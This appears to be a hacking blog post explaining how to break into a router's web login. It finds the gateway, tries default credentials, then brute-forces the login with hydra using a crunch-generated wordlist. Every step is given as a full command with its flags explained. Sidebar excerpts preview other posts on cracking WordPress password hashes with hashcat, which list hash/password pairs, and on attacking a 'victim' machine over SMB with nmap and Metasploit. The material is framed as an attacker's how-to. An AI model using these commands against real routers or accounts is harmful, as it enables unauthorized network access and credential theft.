Cracking Router Password

-
Good evening visitors Art Of Explo1t =))
This time I will discuss how  to get a router password .

A router is a device that mediates the packets between computer networks with other computers, creating interwork overlay networks as well as drive traffic.  I shall illustrate an example like this:

when data packets are in a row then the router will read the address information in the packet and direct the final destination. in other words, the router directs network traffic.

can you imagine if someone attackers can take over your router and change the network traffic.

but here I did not teach it, which I will explain how an attacker managed to break the password.

oke, Let's Rock

now. find target route ip address with command :
# route





Done, gateway uses the ip address 192.168.1.1.
Now, open the ip address using your favorite web browser. and here I using elinks as a web browser


then I tried using the default login
username: admin
password: admin


The password does not work. then we can perform brute forcing using hydra

# hydra -l admin -P /path/your/wordlists/dictionary.lst -e ns -s 80 -f -V 192.168.1.1 http-get /

-l = login
-P = passwordlist
-e =  "n" null password : "s" login as pass
-s = port
-frun TASKS number of connects in parallel
-Vshow login+pass for each attempt / debug mode


for finish


we did not find a suitable password to login. what should we do?
we can make to get the password wordlist using crunch =))

# crunch 5 6 abcd1234 -o /root/Desktop/pass-list.lst

5 = minimum length of characters
6 = maximal length of characters
abcd1234character that I use
-o /root/Desktop/pass-list.lst = I store the result in the Desktop by name pass-list.lst


then the result will be like this:


approximately 192412 words are formed by the crunch, hopefully we get the password ;))

# hydra -l admin -P /root/Desktop/pass-list.lst -e ns -s 80 -f -V 192.168.1.1 http-get /


yeah. i think we successfully get a password router

username : admin
password : abc123

now. back to in your web browser and open the ip address :




regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-PC. now,
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp # mkdir /home/ft
Read more